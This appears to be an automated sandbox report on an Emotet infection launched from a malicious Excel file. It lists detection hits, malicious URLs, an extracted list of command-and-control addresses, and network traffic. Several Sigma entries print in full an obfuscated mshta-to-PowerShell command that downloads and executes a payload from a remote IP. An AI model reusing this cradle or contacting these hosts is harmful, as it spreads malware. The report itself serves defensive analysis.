17.2.rundll32.exe.2d00000.14.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2590000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.210000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.310000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.27e0000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2890000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.b50000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.1c0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2e90000.16.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.10000000.18.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.470000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2f40000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.a00000.5.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.b10000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.10000000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.10000000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.10000000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 105 entries

Sigma Overview

System Summary

Sigma detected: Windows Shell File Write to Suspicious Folder

Source: File created

Author: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2840, TargetFilename: C:\Users\user\AppData\Local

Sigma detected: MSHTA Spawning Windows Shell

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3004

Sigma detected: Suspicious MSHTA Process Patterns

Source: Process started

Author: Florian Roth: Data: Command: mshta http://91.240.118.168/vvv/ppp/fe.html, CommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1760, ProcessCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ProcessId: 2840

Sigma detected: Microsoft Office Product Spawning Windows Shell

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l, CommandLine: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2232, ProcessCommandLine: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l, ProcessId: 1760

Sigma detected: Suspicious PowerShell Command Line

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3004

Sigma detected: Mshta Spawning Windows Shell

Source: Process started

Author: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3004

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/vvv/ppp/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3004

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://91.240.118.168/vvv/ppp/fe.htmlWinSta0	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe	Avira URL Cloud: Label: malware
Source: http://cmit.valestudios.com/wp-admin/RueGJ41A/	Avira URL Cloud: Label: malware
Source: http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/	Avira URL Cloud: Label: phishing
Source: http://91.240.118.168/vvv/ppp/fe.htmlv1.0	Avira URL Cloud: Label: malware
Source: http://bawelnianka.cfolks.pl/wp-content/Ttv/	Avira URL Cloud: Label: phishing
Source: http://ayoobeducationaltrust.in	Avira URL Cloud: Label: phishing
Source: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.pngPE3	Avira URL Cloud: Label: malware
Source: http://cmit.valestudios.com/wp-a	Avira URL Cloud: Label: malware
Source: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/PE3	Avira URL Cloud: Label: malware
Source: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.htmlmshta	Avira URL Cloud: Label: malware
Source: http://test.valestudios.com/wp-c	Avira URL Cloud: Label: malware
Source: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/PE3	Avira URL Cloud: Label: phishing
Source: http://thesocialagent.net/b/MO5AKqJ9Ty9lE/	Avira URL Cloud: Label: malware
Source: http://sellin.app/wp-admin/S2cDPYXNKEnT/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.png	Avira URL Cloud: Label: malware
Source: http://test.dreamcityorlando.com	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.htmlC:	Avira URL Cloud: Label: malware
Source: http://curvygirlsboutique.com/jf	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.html3	Avira URL Cloud: Label: malware
Source: http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/PE3	Avira URL Cloud: Label: malware
Source: http://bawelnianka.cfolks.pl/wp-content/Ttv/PE3	Avira URL Cloud: Label: phishing
Source: http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.html	Avira URL Cloud: Label: malware
Source: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/	Avira URL Cloud: Label: phishing
Source: http://91.240.118.168	URL Reputation: Label: malware

Found malware configuration

Source: 11.2.rundll32.exe.200000.1.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Multi AV Scanner detection for submitted file

Source: 364453688149503140239183.xls

ReversingLabs: Detection: 18%

Multi AV Scanner detection for domain / URL

Source: ayoobeducationaltrust.in	Virustotal: Detection: 9%			Perma Link
Source: http://cmit.valestudios.com/wp-admin/RueGJ41A/	Virustotal: Detection: 12%			Perma Link

Machine Learning detection for dropped file

Source: C:\ProgramData\QWER.dll

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,		9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,		11_2_10021854

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80

Source: global traffic

DNS query: name: ayoobeducationaltrust.in

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.168:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 160.16.102.168:80
Source: Malware configuration extractor	IPs: 131.100.24.231:80
Source: Malware configuration extractor	IPs: 200.17.134.35:7080
Source: Malware configuration extractor	IPs: 207.38.84.195:8080
Source: Malware configuration extractor	IPs: 212.237.56.116:7080
Source: Malware configuration extractor	IPs: 58.227.42.236:80
Source: Malware configuration extractor	IPs: 104.251.214.46:8080
Source: Malware configuration extractor	IPs: 158.69.222.101:443
Source: Malware configuration extractor	IPs: 192.254.71.210:443
Source: Malware configuration extractor	IPs: 46.55.222.11:443
Source: Malware configuration extractor	IPs: 45.118.135.203:7080
Source: Malware configuration extractor	IPs: 107.182.225.142:8080
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 104.168.155.129:8080
Source: Malware configuration extractor	IPs: 195.154.133.20:443
Source: Malware configuration extractor	IPs: 159.8.59.82:8080
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 45.142.114.231:8080
Source: Malware configuration extractor	IPs: 41.76.108.46:8080
Source: Malware configuration extractor	IPs: 203.114.109.124:443
Source: Malware configuration extractor	IPs: 50.116.54.215:443
Source: Malware configuration extractor	IPs: 209.59.138.75:7080
Source: Malware configuration extractor	IPs: 185.157.82.211:8080
Source: Malware configuration extractor	IPs: 164.68.99.3:8080
Source: Malware configuration extractor	IPs: 162.214.50.39:7080
Source: Malware configuration extractor	IPs: 138.185.72.26:8080
Source: Malware configuration extractor	IPs: 178.63.25.185:443
Source: Malware configuration extractor	IPs: 51.15.4.22:443
Source: Malware configuration extractor	IPs: 81.0.236.90:443
Source: Malware configuration extractor	IPs: 216.158.226.206:443
Source: Malware configuration extractor	IPs: 45.176.232.124:443
Source: Malware configuration extractor	IPs: 162.243.175.63:443
Source: Malware configuration extractor	IPs: 212.237.17.99:8080
Source: Malware configuration extractor	IPs: 45.118.115.99:8080
Source: Malware configuration extractor	IPs: 129.232.188.93:443
Source: Malware configuration extractor	IPs: 173.214.173.220:8080
Source: Malware configuration extractor	IPs: 178.79.147.66:8080
Source: Malware configuration extractor	IPs: 176.104.106.96:8080
Source: Malware configuration extractor	IPs: 51.38.71.0:443
Source: Malware configuration extractor	IPs: 173.212.193.249:8080
Source: Malware configuration extractor	IPs: 217.182.143.207:443
Source: Malware configuration extractor	IPs: 212.24.98.99:8080
Source: Malware configuration extractor	IPs: 159.89.230.105:443
Source: Malware configuration extractor	IPs: 79.172.212.216:8080
Source: Malware configuration extractor	IPs: 212.237.5.209:443

Source: global traffic	HTTP traffic detected: GET /vvv/ppp/fe.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cms/LmOOeDnNo0dh4vkN/ HTTP/1.1Host: ayoobeducationaltrust.inConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:28:51 GMTServer: ApacheSet-Cookie: 61f4520308e3e=1643401731; expires=Fri, 28-Jan-2022 20:29:51 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:28:51 GMTExpires: Fri, 28 Jan 2022 20:28:51 GMTContent-Disposition: attachment; filename="xfm.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 